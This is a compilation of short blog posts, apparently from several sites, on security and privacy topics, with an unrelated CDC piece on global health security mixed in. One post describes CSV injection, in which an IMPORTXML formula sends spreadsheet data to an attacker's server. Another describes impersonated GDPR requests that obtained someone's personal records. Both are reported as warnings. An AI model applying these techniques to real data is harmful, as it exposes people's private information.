Quantum computing visual explainer

Quantum computing promises a higher level of processing power over current computers, but it comes with its own challenges with implementation. When it comes to fruition, it’ll also break current privacy measures like your banking password. Financial Times explains how this works with a fine set of animations and illustrations.

Tags: , ,

Inference of key shape from the sound it makes in the lock

Researchers from the National University of Singapore found a way to infer key shape based on the sound the lock makes when you insert the key.

First they capture a sound recording with a standard microphone. Then they run the audio file through software to filter out the metallic clicks. This provides a time series from which they can infer likely keys.

Soundarya Ramesh presented the work at HotMobile 2020 in the talk below:

Oh to be back in graduate school again. [via kottke]

Tags: , ,

To get your personal data, provide more personal data

File another one under the sounds-good-on-paper-but-really-challenging-in-practice. Kashmir Hill, for The New York Times, describes the challenges of new laws that allow users to request the data that companies collect on them:

Since then, two groups of researchers have demonstrated that it’s possible to fool the systems created to comply with G.D.P.R. to get someone else’s personal information.

One of the researchers, James Pavur, 24, a doctoral student at Oxford University, filed data requests on behalf of his research partner and wife, Casey Knerr, at 150 companies using information that was easily found for her online, such as her mailing address, email address and phone number. To make the requests, he created an email address that was a variation on Ms. Knerr’s name. A quarter of the companies sent him her file.

“I got her Social Security number, high school grades, a good chunk of information about her credit card,” Mr. Pavur said. “A threat intelligence company sent me all her user names and passwords that had been leaked.”

Yay.

I’m not saying these new laws are bad, but maybe get yourself a good password manager and change all those duplicate passwords.

Tags: , ,

Dangers of CSV injection

George Mauer highlights how a hacker might access other people’s data by putting an equal sign in a CSV file, so that an import to Microsoft or Google Sheets runs a value as a formula, even if it’s quoted as a string.

The attacker starts the cell with their trusty = symbol prefix and then points IMPORTXML to a server they control, appending as a querystring of spreadsheet data. Now they can open up their server log and bam! Data that isn’t theirs. Try it yourself with a Requestb.in.

The ultra sinister thing here? No warnings, no popups, no reason to think that anything is amiss. The attacker just enters a similarly formatted time/issue/whatever entry, eventually an administrator attempts to view a CSV export and all that limited-access data is immediately, and queitly sent away.

Oh goody.

Tags: ,

Global Health Security Agenda

A man waiting in the airport watching a plane take off

The Plan for 2016: CDC and the President’s Global Health Security Agenda

2015 was a powerful reminder that a health threat anywhere is a health threat everywhere.  In 2016, CDC and partners are looking forward to continuing work on the President’s Global Health Security Agenda (GHSA), an initiative led by the Department of Health and Human Services.

In 2012, only 1 in 6 countries reported being fully prepared for disease outbreaks. As the Ebola epidemic in West Africa tragically demonstrated, it is often the countries with the fewest resources who are hit hardest by public health emergencies.  To better protect people everywhere, the United States has committed more than $1 billion over the next 5 years to help 31 countries better prepare for the health impacts of natural and man-made disasters.  More than half of this historic investment will focus on the continent of Africa to help prevent future outbreaks.

World map of pixels in gray and light gray
There are 31 GHSA countries: Bangladesh • Burkina Faso • Cameroon • Cambodia • Côte d’Ivoire • Democratic Republic of Congo • Ethiopia • Georgia • Ghana • Guinea • Haiti • India • Indonesia • Jordan • Kazakhstan • Kenya • Laos • Liberia • Malaysia • Mali • Mozambique • Pakistan • Peru • Rwanda • Senegal • Sierra Leone • Tanzania • Thailand • Uganda • Ukraine • Vietnam

Global Health Security Agenda Goals

The vision of GHSA is to stop disease outbreaks as quickly as possible.  Partners will work together to build a global network that can respond rapidly and effectively to disease outbreaks and help countries build their own capacity to prevent, detect, and respond to public health emergencies.

The GHSA focuses on accelerating progress toward a world safe from disease threats by supporting enhanced surveillance and biosecurity systems, immunization campaigns, and curtailing antimicrobial resistance. Establishing national laboratory and disease reporting systems will help detect threats early.  In addition to building epidemiologic and laboratory workforce capacity, GHSA also focuses on incident management system training and establishing emergency operations centers around the globe.

As President Obama said at the Global Health Security Agenda Summit in 2014, “We issued a challenge to ourselves and to all nations of the world to make concrete pledges towards three key goals:  prevent, detect, and respond.  We have to prevent outbreaks by reducing risks.  We need to detect threats immediately wherever they arise.  And we need to respond rapidly and effectively when we see something happening, so that we can save lives and avert even larger outbreaks.”

CDC’s Role in Global Health Security
CDC is improving preparedness and response internationally by building close relationships with ministries of health and other public health partners abroad to encourage public health and emergency management capacity building. The agency also provides GHSA countries with resources such as funds, administrative support, and dedicated personnel, including experts in emergency response, electronic surveillance systems, and specific health threats. CDC also links emergency response efforts to recovery efforts to ensure systems and processes that have been put in place for one response can be ready for the next public health emergency.A person is giving another person a vaccine.

Ebola has reminded us that  to protect its citizens, each country should be equipped with a core set of public health capabilities to detect a threat when it emerges, respond rapidly and effectively, and prevent it wherever possible. All countries need to be prepared, since disease monitoring and emergency response begin at the local level.  Local responses will be quicker, more efficient, and more cost-effective than responding from a great distance. However, epidemics do not stay within borders and are not the problem of individual countries or regions. GHSA is an important step toward helping build capacity in other countries and ensuring that when national capacities are overwhelmed, the world moves immediately and decisively to contain the outbreak.

Live cyber attack map

Internet attack map

Norse monitors cyber attacks in real-time. This is their map of what's going on. (All I hear is pew, pew, pew when I watch it.) [via Boing Boing]

Tags: ,

A surveillance system that watches over an entire city

Persistent Surveillance

Technology continues to advance quickly, but the social questions are lagging a bit. Radiolab explores the topic of we-can-but-should-we from the perspective of a surveillance system that watches an entire city twenty-four-seven.

On the one hand, the system allows authorities to find criminals more efficiently. On the other hand, everyone is watched.

Tags: ,

Science for the People: Secure Communications

sftp-square-fistonly-whitebgThis week, Science for the People is looking at technology for keeping secrets safe from prying eyes and ears. We’re joined by Dan Younger, professor emeritus of mathematics at the University of Waterloo, to discuss the remarkable work of his colleague Bill Tutte, who broke the German Lorenz Code during World War II. We’ll also discuss the cutting edge of quantum security with Physics and Computer Science Professor Shohini Ghose.

*Josh provides research & social media help to Science for the People and is, therefore, completely biased.


Filed under: Follies of the Human Condition Tagged: Bill Tutte, communications, Dan Younger, Lorenz Code, Podcast, quantum, science for the people, security, Shohini Ghose, University of Waterloo, World War II, WWII

Reset the Net

We here at The Finch & Pea are supporters of freedom, privacy, and the open exchange of ideas. We do our best to respect your privacy and the rights of those who produce creative content.

To those ends, we have, from the beginning published under Creative Commons licenses and have joined in advocacy to oppose government mass surveillance. Today, we are joining a multitude in the Reset the Net campaign to take steps to provide a secure Internet, because our governments will not act to respect our basic freedoms. As security expert Bruce Schneier has noted, organizations like the NSA have chosen to work to make the Internet less secure for all of us, in order to make it easier for them to attack those they perceive as threats.

As a WordPress.com hosted site, we cannot directly affect the addition of security features as recommended by the Reset the Net campaign. Fortunately, we don’t need to. Automattic, the parent company of WordPress.com has announced that it will be implementing the Reset the Net recommendations by implementing SSL on all its subdomains. They have also created an easy to implement Internet Defense League widget you can put on your own WordPress.com site to help spread the word.

We would also encourage you to click the banner at the bottom of the page or the Reset the Net logo to get information about taking back your privacy and helping to make the Internet secure.


Filed under: Items of Interest Tagged: Internet, NSA, security, surveillance